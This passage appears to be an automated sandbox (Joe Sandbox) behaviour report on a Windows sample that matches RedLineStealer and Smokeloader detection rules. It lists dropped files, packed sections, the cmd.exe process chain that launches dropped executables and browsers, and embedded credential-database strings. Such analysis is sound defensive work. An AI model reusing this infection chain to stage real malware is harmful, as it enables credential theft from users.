                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD4DB00_2_6CAD4DB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB66D900_2_6CB66D90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB9ED700_2_6CB9ED70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC58D200_2_6CC58D20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBFAD500_2_6CBFAD50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB56E900_2_6CB56E90
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADAEC00_2_6CADAEC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB70EC00_2_6CB70EC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBB0E200_2_6CBB0E20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB6EE700_2_6CB6EE70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CADEFB00_2_6CADEFB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CBAEFF00_2_6CBAEFF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD0FE00_2_6CAD0FE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC18FB00_2_6CC18FB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAD6F100_2_6CAD6F10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CB92F700_2_6CB92F70
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_0040C8989_2_0040C898
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_0040E9509_2_0040E950
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004109109_2_00410910
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004109D99_2_004109D9
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004105E09_2_004105E0
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004115809_2_00411580
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004109939_2_00410993
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004106009_2_00410600
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_0040B3479_2_0040B347
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_0040F3C89_2_0040F3C8
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00404610 appears 316 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CC509D0 appears 51 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CA694D0 appears 90 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CA5CBE8 appears 134 times
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 2384
                          Source: file.exe, 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                          Source: file.exe, 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 00000032.00000002.3040304288.00000000009EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 0000002F.00000002.2938541456.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000032.00000002.3036489746.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000000.00000002.2524711199.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 0000002F.00000002.2933859917.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000000.00000002.2523988474.0000000000720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: random[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9975399163251366
                          Source: userGDHIIIIEHC.exe.0.drStatic PE information: Section: tvrujsnp ZLIB complexity 0.9943831390066626
                          Source: amadka[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9975399163251366
                          Source: amadka[1].exe.0.drStatic PE information: Section: tvrujsnp ZLIB complexity 0.9943831390066626
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: Section: ZLIB complexity 0.998260331284153
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: Section: qhedmxhi ZLIB complexity 0.994405249407056
                          Source: explorti.exe.6.drStatic PE information: Section: ZLIB complexity 0.9975399163251366
                          Source: explorti.exe.6.drStatic PE information: Section: tvrujsnp ZLIB complexity 0.9943831390066626
                          Source: axplong.exe.23.drStatic PE information: Section: ZLIB complexity 0.998260331284153
                          Source: axplong.exe.23.drStatic PE information: Section: qhedmxhi ZLIB complexity 0.994405249407056
                          Source: axplong.exe.23.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: RoamingCBGCBGCAFI.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@137/254@82/30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA87030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CA87030
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004190A0
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_004026B8 LoadResource,SizeofResource,FreeResource,9_2_004026B8
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\RNFTPMZX.htmJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9252
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1588
                          Source: C:\Users\userGDHIIIIEHC.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6bJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe"
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: file.exe, file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: file.exe, 00000000.00000003.2268675398.0000000020BF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2257205282.0000000020BD9000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDAAFBAKEBGIJKK.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581655347.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeVirustotal: Detection: 37%
                          Source: file.exeReversingLabs: Detection: 36%
                          Source: userGDHIIIIEHC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: RoamingCBGCBGCAFI.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGDHIIIIEHC.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userGDHIIIIEHC.exe "C:\Users\userGDHIIIIEHC.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCFHCBKKFIJ.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCFHCBKKFIJ.exe "C:\Users\userCFHCBKKFIJ.exe"
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2184,i,4203635227704693361,2033266922296475971,262144 /prefetch:3
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\RoamingCBGCBGCAFI.exe "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:3
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 2384
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2188 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0cf79a7-9fe5-4dbc-be74-a5022d30a8d8} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e94a56a710 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4440 -parentBuildID 20230927232528 -prefsHandle 4424 -prefMapHandle 4420 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9504f799-890a-40e2-aa3f-a414be824c0e} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e95cb89510 rdd
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6788 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6976 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7808 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                          Source: C:\Users\userGDHIIIIEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9252 -s 1304
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=4844 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGDHIIIIEHC.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCFHCBKKFIJ.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userGDHIIIIEHC.exe "C:\Users\userGDHIIIIEHC.exe" Jump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCFHCBKKFIJ.exe "C:\Users\userCFHCBKKFIJ.exe" Jump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
